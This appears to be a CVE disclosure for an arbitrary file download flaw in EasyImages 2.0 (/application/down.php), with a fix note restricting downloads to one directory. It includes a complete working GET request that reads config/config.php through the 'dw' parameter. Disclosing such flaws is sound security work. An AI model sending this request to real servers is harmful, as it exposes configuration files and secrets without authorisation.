Headline
CVE-2022-48161: GitHub - sunset-move/EasyImages2.0-arbitrary-file-download-vulnerability: EasyImages2.0 arbitrary file download vulnerability
Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request.
EasyImages2.0-arbitrary-file-download-vulnerability
Found on: 2022-12-27
Affected version
EasyImages2.0 ≤ v2.6.7
Analysis Report:
Vulnerability path: /application/down.php
payload:
GET /application/down.php?dw=config/config.php HTTP/1.1
Host: 192.168.2.13
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1672116632; Hm_lpvt_c790ac2bdc2f385757ecd0183206108d=1672149755
Connection: close
Any file on the host can be downloaded by passing its path in the dw parameter of the GET request.
Fixes
Restrict downloads to a designated download directory: only files inside that directory may be served, and requests for files in any other directory are filtered and rejected.